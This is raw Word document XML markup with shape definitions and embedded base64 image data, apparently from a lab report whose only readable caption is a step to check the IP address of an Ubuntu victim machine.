                <v:shape id="Picture 2724" o:spid="_x0000_s1173"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3hyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dSgMx&#10;FITvBd8hHMGbpc12W9qyNi1VERQKYv+8PSTH3cXNyZLEdvv2RhB6OczMN8xi1dtWnMiHxrGC0TAH&#10;QaydabhSsN+9DOYgQkQ22DomBRcKsFre3iywNO7MH3TaxkokCIcSFdQxdqWUQddkMQxdR5y8L+ct&#10;xiR9JY3Hc4LbVhZ5PpUWG04LNXb0VJP+3v5YBVmevV2ep5/HeNBjP852m8f3iVbq/q5fP4CI1Mdr&#10;+L/9ahQUs2ICf2/SE5DLXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDg1w3hyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId56" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2725" o:spid="_x0000_s1174"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ozxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6qxtjbSW6imhbeoyJIN4e2WcSzL4N2W2S/vtuQfA4zMw3zGozmkb01LnasoLpJAJB&#10;XFhdc6ngmH++LEA4j6yxsUwKfsnBZv34sMJE24EP1Ge+FAHCLkEFlfdtIqUrKjLoJrYlDt7FdgZ9&#10;kF0pdYdDgJtGxlH0Jg3WHBYqbGlXUXHNfoyCjyE++XP6dV1ML1a3r+WeZ2mu1PPTuF2C8DT6e/jW&#10;/tYK4vd4Dv9vwhOQ6z8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAxaWqM8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F4F03" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="136872B2" wp14:editId="2904C93E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="41202" name="Group 4120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20" name="Shape 497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21" name="Shape 497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2" name="Shape 497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23" name="Shape 497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4" name="Shape 497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202" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49725" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49726" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49727" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49728" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4972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96128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37A91A4D" wp14:editId="6D62E073">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41203" name="Group 4120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30" name="Shape 497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31" name="Shape 497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32" name="Shape 497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33" name="Shape 497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34" name="Shape 497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203" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49735" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49736" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49737" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49738" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 497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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162711D7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05498BE0" wp14:editId="7187B9A8">
                <wp:extent cx="5986577" cy="3559023"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41200" name="Group 41200"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3559023"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3559023"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2708" name="Rectangle 2708"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="766784" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="214F0B56"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4 :</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2709" name="Rectangle 2709"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="577545" y="0"/>
                            <a:ext cx="1057039" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7839B641" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Check </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>ip</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> of </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2710" name="Rectangle 2710"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1371930" y="0"/>
                            <a:ext cx="913938" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1936E033" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Ubuntu (V</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2711" name="Rectangle 2711"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2059254" y="0"/>
                            <a:ext cx="434166" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65DCF132" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>ictim</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2712" name="Rectangle 2712"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2385390" y="0"/>
                            <a:ext cx="61213" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6364C9CB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2713" name="Rectangle 2713"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2431110" y="0"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5243AFC6"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714" name="Rectangle 2714"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2473782" y="0"/>
                            <a:ext cx="756447" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6839802E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>machine</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2715" name="Rectangle 2715"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3042488" y="0"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="288094E3"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716" name="Rectangle 2716"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3409823"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="14545E2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727" name="Picture 2727"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId57"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="186263"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2728" name="Shape 2728"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="173562"/>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98BE0" id="Group 41200" o:spid="_x0000_s1175" style="width:471.4pt;height:280.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,355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rNUF6wQAAJYYAAAOAAAAZHJzL2Uyb0RvYy54bWzkWdtu4zYQfS/Q&#10;fxD0vrHuN8RZFJtusEDRDfbyATRNWUIpUiDpS/r1naEk2om9jZECa6AOEJuihsOZOTMT8uT2/a7j&#10;3oYp3Uox98ObwPeYoHLZitXc//7t47vC97QhYkm4FGzuPzHtv7/79ZfbbV+xSDaSL5nyQInQ1baf&#10;+40xfTWbadqwjugb2TMBL2upOmLgUa1mS0W2oL3jsygIstlWqmWvJGVaw+z98NK/s/rrmlHzua41&#10;Mx6f+2CbsZ/Kfi7wc3Z3S6qVIn3T0tEM8gYrOtIK2NSpuieGeGvVHqnqWqqklrW5obKbybpuKbM+&#10;gDdh8MKbByXXvfVlVW1XvQsThPZFnN6slv65eVD91/5RQSS2/QpiYZ/Ql12tOvwGK72dDdmTCxnb&#10;GY/CZFoWWZrnvkfhXZymZRDFQ1BpA5E/Wkeb319ZOZs2nj0zZ9tDguh9DPR/i8HXhvTMhlZXEINH&#10;5bXLuR/lAeSrIB1k6hfIHSJWnHl21obHyrpg6UpD3M6NVJ5leZEMgQrLIokzjJPzllS90uaByc7D&#10;wdxXsL9NKbL5Q5tBdBLBPbnATyE/tpwPb3EGgjaZhSOzW+ysZ1mIu+HUQi6fwN1Gqr8/Q+HWXG7n&#10;vhxHPtYybI5vfY9/EhBmLJtpoKbBYhoowz9IW1yDOb+tjaxba+9+t9EuwG+w4WcAWZ4EspzCAKC/&#10;DiRkdpqkvnec92GQ5kEMe2DeXwDOaPLjSuAMIQuP6xJmx6w+C84wzsMyBk3HeJZhXMZQ+xeC0/bM&#10;fb3876szDE/C6ZrUWXBGQVpGKbTUYziTOAmz7GJwJlNaXkt1RifhdE3qPDjjIo3Lk9WZhVEYXwzN&#10;9NrQhFCf6LWuR52HZhKHIXbt4+JM0/SCrdYeu66p1UKDPIGma1FnopnHeQFVfoxmnmZJMl4ALnAQ&#10;yq+tOOE4egJO16POgjMOkigp4LhzDOdli7O4NjThjHICTdejzkIzLZOkiIZWGydBWUxXcHdJv2jD&#10;dVeuSx+G+pZW8DvSKDA6ohBep5tglVkr5o9KurN0dET9te7fAePTE9MuWt6aJ8tewf0ejRKbx5Yi&#10;k4APALljIyLoq0N6gADuC1wEzMGdZ5LEdXj7x+dnaha87ZEawFs5jkeDgfp6QR2d8Hmgpe4lXXdM&#10;mIFnU4yD7VLopu2176mKdQsGlIn6tLSndlJpo5ihDW5Yw8bIn6BlBy+slXvD0OYfMChxEQdwCoH2&#10;FBZZlI2UksvnAv4apZDwlnQCyTKw/e+tZIq1a7DEDsGwn8ZTRI5wspQUAuya4FnVH6XZFKo8TjN7&#10;5ibVPlRlGe5DFcH192Wo6HrgnRC4iWsCInM5sE4w10wjuhPTENmpf+VUIdNxHSrFoQckU1qMtjRA&#10;FcaDKfi+A/bpm7SSZk8YThJDDu1luDiUdTohVZ6vmOSm797qPpS35AHkzCQxfQ+SB0fXAxnKpWaD&#10;SeiWzW/nKsgdBpML9BpuqAGmKgF2u4YaspweELtiOag5wdpp88QZxoOLL6wG/g6I1tCu02q1+MCV&#10;tyFIudkf7AbWQBDFNUPtjauCH65CUcL7hoy6RjXjBlblqAklmaXSnTGjWjpaM/DpwEqDnxOrDia5&#10;RdYsKYxbL+B/AXZDPIeP3u6P5OgQPlm60LLAQH5bi0aiHtn1w2crv/93wt0/AAAA//8DAFBLAwQK&#10;AAAAAAAAACEAAZyE9ToGAQA6BgEAFAAAAGRycy9tZWRpYS9pbWFnZTEuanBn/9j/4AAQSkZJRgAB&#10;AQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsL&#10;EBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIeA8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tJ0Xw/ZeDdOvr3S7IRx&#10;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